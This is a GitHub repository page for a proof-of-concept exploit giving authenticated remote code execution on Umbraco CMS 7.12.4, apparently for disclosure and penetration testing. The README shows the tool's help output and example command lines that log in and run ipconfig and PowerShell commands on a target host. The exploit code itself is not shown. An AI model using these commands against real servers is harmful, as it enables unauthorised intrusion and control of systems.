Skip to content
/ Umbraco-RCE Public

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

pwn.by/noraj/

License

MIT license
73 stars 40 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

noraj/Umbraco-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Examples:

$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.

Tested with python 3.8.

About

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

pwn.by/noraj/

Topics

proof-of-concept exploit umbraco poc rce umbraco-cms umbraco-v7 remote-code-execution umbraco7

Resources

Readme

License

MIT license
Activity

Stars

73 stars

Watchers

7 watching

Forks

40 forks
Report repository

Contributors 2

Languages